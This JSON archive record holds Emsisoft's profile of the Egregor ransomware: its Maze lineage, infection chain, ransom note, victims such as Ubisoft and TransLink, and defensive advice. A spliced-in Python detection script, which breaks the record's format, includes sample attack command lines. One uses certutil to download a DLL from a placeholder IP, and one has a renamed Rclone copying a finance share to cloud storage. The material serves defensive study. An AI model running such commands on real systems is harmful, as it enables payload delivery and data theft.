{
	"id": "3ee50797-786f-42ea-a32e-f0598c31feb6",
	"created_at": "2026-04-06T00:06:31.032591Z",
	"updated_at": "2026-04-10T03:21:32.256352Z",
	"deleted_at": null,
	"sha1_hash": "373012e9ab3c04923b526b0f168f33312d2d99ff",
	"title": "Ransomware Profile: Egregor",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 62231,
	"plain_text": "Ransomware Profile: Egregor\r\nBy Emsisoft Malware Lab\r\nPublished: 2021-02-15 · Archived: 2026-04-05 14:37:36 UTC\r\nEgregor is an aggressive strain of ransomware that targets large organizations. It has been extremely active since its discovery in September 2020, claiming hundreds of victims across multiple industries.\r\nThe chart in the original post shows the number of Egregor samples submitted to ID Ransomware, an online tool that allows users to identify which ransomware strain has encrypted their files and provides a free decryptor should one be available.\r\nThe submission data shows that Egregor claimed a large number of victims in a very short space of time and possibly amassed victims more quickly than any other group. This surge of attacks was likely the result of former Maze affiliates bringing lists of already-compromised networks to the Egregor affiliate program.\r\nWithin a month, however, the rate of attacks dropped significantly. This decrease was likely due to the affiliates who crossed over from Maze quickly exhausting their lists of already-compromised networks and effectively running out of easy prospective targets.\r\nWhat is Egregor?\r\nEgregor is a sophisticated strain of ransomware that encrypts files using ChaCha and RSA encryption and uses advanced obfuscation techniques to thwart analysis efforts. The name “Egregor” is derived from the ancient Greek word for “wakeful”; in occultism, an egregore is the collective energy of a group of people working toward a common goal – an appropriate name for a ransomware group.\r\nLike many other modern ransomware groups, Egregor’s operators exfiltrate data from victims and store it on their servers before the data is encrypted on the target’s machine. 
Egregor demands a swift response, giving victims just 72 hours to make contact with the attackers.\r\nIn the event of non-payment, the stolen data is published on the attackers’ leak site, Egregor News, which can be accessed on both the clear web and the dark web. One of the last known banner messages on the Egregor News website was the Christmas greeting: “Egregor Team wishes all clients happy holidays. Christmas gifts are waiting for you. Details in your personal chat!”\r\nEgregor operates under the ransomware-as-a-service model, whereby affiliates receive a portion of ransom payments in exchange for deploying the malware on victims’ networks. Egregor affiliates earn 70 percent of the ransom payments they generate, with the remaining 30 percent going to the Egregor group. It is believed that the Egregor affiliate program attracted many ex-Maze affiliates following the sudden retirement of the Maze ransomware gang in November 2020.\r\nThe Egregor-Sekhmet-Maze connection\r\nhttps://blog.emsisoft.com/en/37810/ransomware-profile-egregor/\r\nPage 1 of 5\n\nEgregor, Sekhmet and Maze share almost exactly the same base code. Sekhmet, a now inactive strain of ransomware that was first detected in March 2020, is identical to Maze apart from one small tweak to the way it uses file markers. Egregor, in turn, is identical to Sekhmet except for a different file marker value and different ransom note text.\r\nWhile it is not clear whether the creators of Sekhmet and/or Maze are responsible for Egregor, the three variants clearly share significant similarities. The Sekhmet leak platform – which exposed just six victims in total – went offline at around the same time as the launch of the Egregor News site.\r\nThe History of Egregor\r\nEgregor was first observed in September 2020. 
It was an extremely active threat from the outset, claiming more than 130 victims in the first 10 weeks, including high-value targets in the industrial goods, retail and transportation sectors.\r\nSuspected Egregor operators arrested\r\nIn February 2021, alleged Egregor operators were arrested in Ukraine following a joint investigation by French and Ukrainian police, coordinated by Europol. Investigators were able to track down the unnamed suspects by following the flow of bitcoin handled by the alleged operators. According to France Inter, the arrested suspects provided hacking, logistical and financial support for the Egregor group. On February 17, 2021, the Ukrainian Security Service confirmed an undisclosed number of arrests in connection with the Egregor operation.\r\nThe group’s extortion site went offline around the time of the arrests, making it impossible for victims to pay a ransom or contact the ransomware group. It is worth noting that the Egregor extortion site had been going offline intermittently for some time prior to the arrests, so it is possible that the disruption is unrelated.\r\nEgregor ransom note\r\nAfter encrypting the target system, Egregor drops a ransom note titled “RECOVER-FILES.txt” in every affected directory. The ransom note is fairly vague and contains no specific payment instructions. Instead, it instructs victims to install the Tor Browser, navigate to the operators’ website and open a live chat with the threat actors, who will then provide further instructions. 
The note states that stolen data will be published if no contact is made within three days.\r\nThe note claims that after receiving payment the attackers will provide full decryption of all affected machines, a file listing of the downloaded data, confirmation of the deletion of exfiltrated data and complete confidentiality. Audaciously, the note also states that the operators will provide paying victims with recommendations for securing their networks to prevent future breaches.\r\nEgregor is the only ransomware family known to print ransom notes on printers reachable from compromised networks.\r\nWho does Egregor target?\r\nEgregor targets large organizations. While the industrial goods and services sector was initially the most heavily hit, enterprises across a wide range of verticals have since been impacted by Egregor.\r\nEgregor primarily targets U.S.-based organizations, although a number of companies in South America, Africa, Asia, Europe and Oceania have also been infected.\r\nBefore encrypting data on a compromised machine, Egregor checks the default language ID of the system and of the user account. The ransomware does not execute if any of the following languages are detected: Uzbek, Romanian, Azerbaijani, Turkmen, Georgian, Kyrgyz, Ukrainian, Kazakh, Tatar, Russian, Tajik, Armenian, Belarusian.\r\nHow does Egregor spread?\r\nThe information currently available suggests that the infection chain typically starts with a phishing email which contains a malicious macro embedded in an attached document.\r\nUpon execution, the macro downloads commodity malware such as Qakbot, IcedID and/or Ursnif, which is used to gain an initial foothold in the target environment. 
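To make the infection chain this section describes (a macro in an attached document launching a loader, Cobalt Strike and Rclone later in the chain pushing data to cloud storage, and a RECOVER-FILES.txt note dropped in each affected directory) concrete on the defensive side, here is an added detection example; it is not part of the original Emsisoft post. It runs over constructed Sysmon-style events (Event ID 1 process creation and Event ID 11 file creation, with invented paths and command lines written with forward slashes) and flags each stage. The check on the PE OriginalFileName for a renamed Rclone binary and the remote-name heuristic are assumptions of this example, not behaviour the post documents.

```python
import ntpath

# Office hosts that a malicious macro runs in, and the script hosts / LOLBins
# such a macro typically launches to fetch a loader (Qakbot, IcedID, Ursnif).
OFFICE_APPS = {'winword.exe', 'excel.exe', 'powerpnt.exe'}
SCRIPT_HOSTS = {'cmd.exe', 'powershell.exe', 'wscript.exe', 'cscript.exe',
                'mshta.exe', 'rundll32.exe', 'regsvr32.exe', 'certutil.exe'}
# Rclone sub-commands that move data; an rclone remote is written as name:path.
RCLONE_VERBS = {'copy', 'sync', 'move', 'copyto', 'moveto'}
RANSOM_NOTE = 'recover-files.txt'

def basename(path):
    # ntpath splits Windows paths on either separator, on any host platform.
    return ntpath.basename(path).lower()

def looks_like_rclone(event):
    # Assumption of this example: affiliates may rename the binary, so match on
    # the PE OriginalFileName field as well as on the image path.
    names = {basename(event.get('Image', '')), event.get('OriginalFileName', '').lower()}
    return 'rclone.exe' in names

def has_remote_target(cmdline):
    # Heuristic: a token like mega:backup names a remote; a single-letter head
    # such as c:/data is a local drive and is ignored.
    for tok in cmdline.split():
        if ':' in tok and not tok.startswith('-'):
            head = tok.split(':', 1)[0]
            if len(head) > 1 and head.replace('-', '').replace('_', '').isalnum():
                return True
    return False

def classify(event):
    # Returns the list of findings for one Sysmon-style event dict.
    findings = []
    if event.get('EventID') == 1:  # ProcessCreate
        image = basename(event.get('Image', ''))
        parent = basename(event.get('ParentImage', ''))
        cmd = event.get('CommandLine', '')
        if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
            findings.append('macro-spawned-child')
        if looks_like_rclone(event):
            verbs = set(cmd.lower().split()) & RCLONE_VERBS
            if verbs and has_remote_target(cmd):
                findings.append('rclone-exfil')
            else:
                findings.append('rclone-present')
    elif event.get('EventID') == 11:  # FileCreate
        if basename(event.get('TargetFilename', '')) == RANSOM_NOTE:
            findings.append('ransom-note-dropped')
    return findings

def scan(events):
    # Map RecordId to findings, dropping events with nothing to report.
    out = {}
    for e in events:
        hits = classify(e)
        if hits:
            out[e['RecordId']] = hits
    return out

# Constructed sample events for this example; not taken from a real incident.
SAMPLE_EVENTS = [
    {'RecordId': 1, 'EventID': 1, 'Image': 'C:/Program Files/Microsoft Office/root/Office16/WINWORD.EXE',
     'ParentImage': 'C:/Windows/explorer.exe', 'CommandLine': 'WINWORD.EXE invoice.docm'},
    {'RecordId': 2, 'EventID': 1, 'Image': 'C:/Windows/System32/cmd.exe',
     'ParentImage': 'C:/Program Files/Microsoft Office/root/Office16/WINWORD.EXE',
     'CommandLine': 'cmd /c certutil -urlcache -f http://203.0.113.5/x.dll %TEMP%/x.dll'},
    {'RecordId': 3, 'EventID': 1, 'Image': 'C:/Users/Public/svchost.exe', 'OriginalFileName': 'rclone.exe',
     'ParentImage': 'C:/Windows/System32/cmd.exe',
     'CommandLine': 'svchost.exe copy F:/Finance mega:backup --transfers 8 -q'},
    {'RecordId': 4, 'EventID': 1, 'Image': 'C:/Tools/rclone.exe', 'ParentImage': 'C:/Windows/System32/cmd.exe',
     'CommandLine': 'rclone.exe lsd c:/data'},
    {'RecordId': 5, 'EventID': 11, 'Image': 'C:/Users/Public/svchost.exe',
     'TargetFilename': 'F:/Finance/2020/RECOVER-FILES.txt'},
]

if __name__ == '__main__':
    for rid, hits in scan(SAMPLE_EVENTS).items():
        print(rid, hits)
```

Record 1 (a user opening a document) is benign and produces nothing; record 2 (Word spawning cmd.exe to download a DLL) is the macro stage; record 3 is Rclone renamed to svchost.exe copying a share to a cloud remote; record 4 is Rclone present but only listing a local drive, which is worth a lower-severity alert; record 5 is the ransom note being written. In production the same logic would sit on an EDR or SIEM query rather than a Python loop, and the Rclone signal should be correlated with outbound volume on the network side, which the post recommends monitoring.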
The operators of Qakbot, a banking Trojan that is commonly used to drop malware onto infected networks, recently switched from dropping ProLock, another prominent ransomware strain, to dropping Egregor.\r\nLater in the attack chain, operators use Cobalt Strike to gather information, escalate privileges, move laterally across the network and prepare systems for encryption. To exfiltrate data, operators typically use Rclone, an open-source command line program for managing cloud storage. There have also been instances of operators using Cobalt Strike to open RDP connections to other endpoints on the network and copying Egregor to them.\r\nIt is important to note that because Egregor is a ransomware-as-a-service operated by multiple affiliates, infection methods can vary. We have heard rumors of Egregor exploiting flaws in Microsoft Exchange, the VBScript Engine and Adobe Flash Player, but these reports are still unsubstantiated.\r\nMajor Egregor attacks\r\nUbisoft\r\nIn October 2020, Egregor captured the attention of the cybersecurity industry with a high-profile attack on video game developer Ubisoft. The threat actors initially released a few hundred megabytes of data relating to in-game assets, before later releasing 560GB of source code from Ubisoft’s latest action-adventure game, Watch Dogs: Legion.\r\nBarnes \u0026 Noble\r\nIn October 2020, Barnes \u0026 Noble was hit with Egregor. The incident forced the U.S. bookstore giant to shut down its network to stop the attack from spreading, leaving Nook users unable to access their eBook libraries. 
The threat actors claimed to have stolen financial and audit data during the attack, while email addresses, billing addresses, shipping addresses and purchase histories were also exposed on the compromised systems.\r\nTransLink\r\nIn December 2020, Metro Vancouver transport agency TransLink faced significant disruption after falling victim to Egregor. The attack impacted phones, online services and payment systems, leaving commuters unable to pay for fares with credit or debit cards. During the incident, ransom notes were printed from TransLink printers as well as dropped digitally in affected directories.\r\nRandstad\r\nIn December 2020, Randstad, one of the largest recruitment agencies in the world, announced that its network had been breached by Egregor. The operators published a 32.7 MB archive of exfiltrated data, which they claimed was just 1 percent of the total data stolen during the attack. The leaked data contained a range of business documents, including financial reports, legal documents and accounting spreadsheets.\r\nHow to protect the network from Egregor and other ransomware\r\nThe following practices may help organizations reduce the risk of an Egregor incident.\r\nCybersecurity awareness training: Because the majority of ransomware spreads through user-initiated actions, organizations should implement training initiatives that teach end users the fundamentals of cybersecurity. 
Ransomware and its propagation methods are constantly evolving, so training must be an ongoing process to ensure end users are aware of current threats.\r\nCredential hygiene: Practicing good credential hygiene can help prevent brute-force attacks, mitigate the effects of credential theft and reduce the risk of unauthorized network access.\r\nMulti-factor authentication: MFA provides an extra layer of security that can help prevent unauthorized access to accounts, tools, systems and data repositories. Organizations should consider enabling MFA wherever possible.\r\nSecurity patches: Organizations of all sizes should have a robust patch management strategy that ensures security updates for all endpoints, servers and appliances are applied as soon as possible, to minimize the window of opportunity for an attack.\r\nBackups: Backups are one of the most effective ways of mitigating the effects of a ransomware incident. Many strains of ransomware can spread laterally across the network and encrypt locally stored backups, so organizations should use a mixture of storage media and keep backup copies both on- and off-site. See this guide for more information on creating ransomware-proof backups.\r\nSystem hardening: Hardening networks, servers, operating systems and applications is crucial for reducing the attack surface and managing potential security vulnerabilities. Disabling or restricting unneeded and potentially exploitable features such as PowerShell, RDP, Windows Script Host and Microsoft Office macros reduces the risk of initial infection, while implementing the principle of least privilege can help limit lateral movement.\r\nBlock macros: Many ransomware families are delivered via macro-embedded Microsoft Office or PDF documents. 
Organizations should review their use of macros, consider blocking all macros in documents that originate from the Internet, and only allow vetted and approved macros to execute from trusted locations.\r\nEmail authentication: Organizations can use a variety of email authentication techniques such as Sender Policy Framework (SPF), DomainKeys Identified Mail (DKIM) and Domain-based Message Authentication, Reporting and Conformance (DMARC) to detect email spoofing and identify suspicious messages.\r\nNetwork segregation: Effective network segregation helps contain incidents, prevents the spread of malware and reduces disruption to the wider business.\r\nNetwork monitoring: Organizations of all sizes must have systems in place to monitor possible data exfiltration channels and respond immediately to suspicious activity.\r\nPenetration testing: Penetration testing can be useful for revealing vulnerabilities in IT infrastructure and employees’ susceptibility to ransomware. The results of the test can be used to allocate IT resources and inform future cybersecurity decisions.\r\nIncident response plan: Organizations should have a comprehensive incident response plan in place that details exactly what to do in the event of infection. A swift response can help prevent malware from spreading, minimize disruption and ensure the incident is remediated as efficiently as possible.\r\nHow to remove Egregor and other ransomware\r\nEgregor uses sophisticated encryption methods that currently make it impossible to decrypt data without paying for an attacker-supplied decryption tool; no free decryptor is available.\r\nVictims of Egregor should be prepared to restore their systems from backups, using processes that should be defined in the organization’s incident response plan. 
The following actions are recommended:\r\nTake action to contain the threat.\r\nDetermine the extent of the infection.\r\nIdentify the source of the infection.\r\nCollect evidence.\r\nRestore the systems from backups.\r\nEnsure all devices on the network are clean.\r\nPerform a comprehensive forensic analysis to determine the attack vector, the scope of the incident and the extent of data exfiltration.\r\nIdentify and remediate the vulnerabilities that were exploited to reduce the risk of a repeat incident.\r\nSource: https://blog.emsisoft.com/en/37810/ransomware-profile-egregor/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.emsisoft.com/en/37810/ransomware-profile-egregor/"
	],
	"report_names": [
		"ransomware-profile-egregor"
	],
	"threat_actors": [],
	"ts_created_at": 1775433991,
	"ts_updated_at": 1775791292,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/373012e9ab3c04923b526b0f168f33312d2d99ff.pdf",
		"text": "https://archive.orkl.eu/373012e9ab3c04923b526b0f168f33312d2d99ff.txt",
		"img": "https://archive.orkl.eu/373012e9ab3c04923b526b0f168f33312d2d99ff.jpg"
	}
}